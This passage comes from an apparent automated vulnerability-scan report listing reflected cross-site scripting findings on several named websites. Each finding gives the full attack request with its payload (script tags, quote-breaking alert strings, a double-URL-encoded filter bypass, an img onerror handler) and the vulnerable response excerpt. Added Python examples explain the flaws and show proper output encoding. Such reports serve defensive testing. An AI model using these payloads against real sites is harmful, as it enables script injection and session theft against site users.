Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:00 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...

4.147. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ab29"><script>alert(1)</script>cc275c6ab53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:01 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...

4.148. http://www.info.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4beb'><a>13945db1d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?c4beb'><a>13945db1d18=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:19:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17819

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<img src='http://info.intelli-direct.com/e/t3.dll?280&0&%20&qcat%3DWeb%26itpage%3D?c4beb'><a>13945db1d18=1&iREGQry&iSale&0&0&0&0&0&0&%20&1500&%20&0' height=1 width=1 border=0>
...[SNIP]...

4.149. http://www.info.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9857d"-alert(1)-"1634c822576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9857d"-alert(1)-"1634c822576=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Sun, 17 Apr 2011 14:19:47 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17824

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<!--
var pqry="qcat%3DWeb%26itpage%3D?9857d"-alert(1)-"1634c822576=1";var rqry="iREGQry";var sqry="iSale";var dt=window.document,nr=navigator,ina=nr.appName,sr="0&0",px=0,sv=10,je=0; var inav=nr.appVersion,iie=inav.indexOf('MSIE '),intp=(ina.indexOf('Netscape')>
...[SNIP]...

4.150. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 was submitted in the REST URL parameter 1. This input was echoed as 436a5<script>alert(1)</script>d23057a9ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /washington%20dc%20law%20firms436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:20:35 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1303050035+last_cmp++engineset+int-only; expires=Thu, 16-Apr-2037 21:28:31 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40031

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms436a5%3cscript%3ealert%281%29%3c%2fscript%3ed23057a9ce0 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+436a5%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed23057a9ce0&r_cop=spell" style="text-decoration:underline">washington dc law firms 436a5<script>alert(1)</script>d23057a9ce0</a>
...[SNIP]...
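
The bypass described in 4.150 works because the value is URL-decoded twice: once by the server or framework before the character filter inspects it, and again by the application before it writes the keyword into the page (the title in the response above still shows %3cscript%3e, the link text shows the fully decoded tags). The Python below is an added example and not the report's or info.com's code; it models that flawed pipeline with an assumed character blacklist, shows why %253c passes it, and contrasts a version that decodes exactly once and HTML-encodes on output. The encoding_depth helper is a practical heuristic for log searches or WAF rules: a path that still changes after a second decode is double-encoded (a literal "%" followed by two hex digits in legitimate data will also trip it, so treat hits as leads, not verdicts).

```python
import html
from urllib.parse import unquote

# Payloads from finding 4.150: single- and double-URL-encoded <script>alert(1)</script>.
SINGLE = "436a5%3cscript%3ealert%281%29%3c%2fscript%3ed23057a9ce0"
DOUBLE = "436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0"

BLOCKED = set('<>"\'')   # assumed character blacklist applied by the site


def filter_rejects(raw_segment: str) -> bool:
    """Assumed front-end check: inspects the path after the single decode a
    web server normally performs. %3c becomes '<' here; %253c only becomes %3c."""
    return any(c in BLOCKED for c in unquote(raw_segment))


def vulnerable_render(raw_segment: str):
    """Model of the flawed pipeline in 4.150: filter on the once-decoded value,
    then decode a second time before writing it as plain text between tags.
    Returns None when the filter blocks the request."""
    if filter_rejects(raw_segment):
        return None
    keyword = unquote(unquote(raw_segment))
    return '<a href="#">washington dc law firms %s</a>' % keyword


def safe_render(raw_segment: str) -> str:
    """Hardened version: decode exactly once, never re-decode, and HTML-encode
    at the output point regardless of any upstream filter."""
    keyword = unquote(raw_segment)
    return '<a href="#">washington dc law firms %s</a>' % html.escape(keyword, quote=True)


def encoding_depth(value: str) -> int:
    """Number of URL-decoding passes that still change the value. Plain input
    gives 0, a normally encoded value 1; 2 or more means double encoding."""
    depth = 0
    while True:
        decoded = unquote(value)
        if decoded == value:
            return depth
        value, depth = decoded, depth + 1


if __name__ == "__main__":
    for name, p in (("single", SINGLE), ("double", DOUBLE)):
        print(name, "depth", encoding_depth(p), "->", vulnerable_render(p))
```

The fix is not a better blacklist: once the output point encodes for its context, the number of decodes upstream stops mattering for injection, and removing the second decode keeps the keyword the user actually typed.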

4.151. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d198'-alert(1)-'69c20afbe3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5d198'-alert(1)-'69c20afbe3b=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:45 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A38
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fcj5d3imp2gaac3js0iubt32; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9869
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?5d198'-alert(1)-'69c20afbe3b=1';//]]>
...[SNIP]...
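
Findings 4.149 and 4.151 differ from the attribute cases: the parameter name lands inside a JavaScript string literal in an inline script, so the payload needs only the matching quote character, and the -alert(1)- form then becomes a subtraction expression sitting between two now-separate string literals. The Python below is an added example, not code from the report or from either site; it reconstructs the two template shapes from the responses above (the exact templates are assumptions), shows where a JavaScript parser would end the first string literal and what it would then run as code, and contrasts a rendering that serialises the value with json.dumps and additionally escapes "</" so the value cannot close the script element at the HTML level either.

```python
import json
import re

# Payloads taken from findings 4.149 and 4.151 (double- and single-quoted contexts).
DQ_PAYLOAD = '9857d"-alert(1)-"1634c822576=1'
SQ_PAYLOAD = "5d198'-alert(1)-'69c20afbe3b=1"

# One JavaScript string literal, honouring backslash escapes inside it.
_LITERAL = {
    '"': re.compile(r'"(?:[^"\\\n]|\\.)*"'),
    "'": re.compile(r"'(?:[^'\\\n]|\\.)*'"),
}


def render_unsafe_dq(query: str) -> str:
    """Assumed shape of the info.com template: the query string is spliced
    straight into a double-quoted literal in an inline script."""
    return 'var pqry="qcat%%3DWeb%%26itpage%%3D?%s";var rqry="iREGQry";' % query


def render_unsafe_sq(query: str) -> str:
    """Assumed shape of the jonesdaydiversity.com template (single quotes)."""
    return "myForm.action='/Home.aspx?%s';//]]>" % query


def js_string(value: str) -> str:
    """Serialise value as a JavaScript string literal safe for an inline script.
    json.dumps escapes quotes, backslashes and control characters and, with the
    default ensure_ascii, turns U+2028/U+2029 into Unicode escapes; the extra
    replacement stops a literal '</script>' inside the value from ending the
    script element, which the HTML parser would do before JavaScript ever runs."""
    return json.dumps(value).replace("</", "<\\/")


def render_safe_dq(query: str) -> str:
    """Hardened template: the literal, delimiters included, comes from js_string."""
    return "var pqry=%s;var rqry=\"iREGQry\";" % js_string("qcat%3DWeb%26itpage%3D?" + query)


def first_literal(script: str, quote: str) -> str:
    """Content of the first string literal (delimited by `quote`) a JavaScript
    parser would see, without its delimiters: where the intended string ends."""
    m = _LITERAL[quote].search(script)
    return m.group(0)[1:-1] if m else ""


def code_after_literal(script: str, quote: str) -> str:
    """Whatever follows the first literal is parsed as JavaScript code, not data."""
    m = _LITERAL[quote].search(script)
    return script[m.end():] if m else ""


def literal_holds_whole_value(script: str, expected: str) -> bool:
    """True when the first double-quoted literal decodes back to the full value,
    i.e. no part of the value escaped into code."""
    m = _LITERAL['"'].search(script)
    return m is not None and json.loads(m.group(0)) == expected


if __name__ == "__main__":
    bad = render_unsafe_dq(DQ_PAYLOAD)
    print("literal ends at:", first_literal(bad, '"'))
    print("then executes  :", code_after_literal(bad, '"'))
    print("safe           :", render_safe_dq(DQ_PAYLOAD))
```

The json.dumps output must replace the whole literal, delimiters included; dropping it between an existing pair of quotes reintroduces the bug. HTML entity encoding is the wrong tool in this context, since entities are not decoded inside a script element and the quotes would remain live.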

4.152. http://www.jumptags.com/add/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumptags.com
Path:   /add/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfaa"><script>alert(1)</script>8d9f2554263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add/?6bfaa"><script>alert(1)</script>8d9f2554263=1 HTTP/1.1
Host: www.jumptags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sunday 15-May-1994 12:00:00 GMT
Date: Sun, 17 Apr 2011 13:55:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=172837142;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: CFTOKEN=71173826;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: JSESSIONID=843026b25bd8e385f77c781a33293677206c;path=/
Content-Length: 2684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- *** P
...[SNIP]...
<form action="/add/index.cfm?6bfaa"><script>alert(1)</script>8d9f2554263=1" method="post" name="l" id="l">
...[SNIP]...

4.153. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2413"><a>4930429a96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grabf2413"><a>4930429a96f/addItemWithUrl HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22268%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grabf2413"><a>4930429a96f/addItemWithUrl.html" />
...[SNIP]...

4.154. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f220"><a>389513feb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grab/addItemWithUrl3f220"><a>389513feb5b HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:23 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22526%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grab/addItemWithUrl3f220"><a>389513feb5b.html" />
...[SNIP]...

4.155. http://www.kaboodle.com/grab/addItemWithUrl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f9f"><script>alert(1)</script>e350adcdd3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /grab/addItemWithUrl?a5f9f"><script>alert(1)</script>e350adcdd3f=1 HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22267%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 3118
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>


            <link r
...[SNIP]...
<input type="hidden" name="a5f9f"><script>alert(1)</script>e350adcdd3f" value="1"/>
...[SNIP]...

4.156. http://www.kaboodle.com/za/additem [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /za/additem

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea03"><a>2463a037575 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /zaaea03"><a>2463a037575/additem?a5f9f= HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/grab/addItemWithUrl?a5f9f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee350adcdd3f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ss=""; pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; sd=%7B%22mv%22%3A%22654%22%2C%22mv_s%22%3A%221%22%7D; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26D57BF7851D2609-60000130002CA7D2[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:24 GMT
Content-Length: 70270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/zaaea03"><a>2463a037575/additem.html" />
...[SNIP]...

4.157. http://www.kirtsy.com/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kirtsy.com
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc309\"><img src=a onerror=alert(1)>f2948ed7988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

